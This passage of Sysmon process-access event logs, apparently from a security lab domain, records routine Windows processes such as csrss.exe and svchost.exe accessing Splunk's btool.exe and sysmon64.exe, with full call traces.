Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010FE900500}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010FE900500}","TargetProcessId":"4704","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
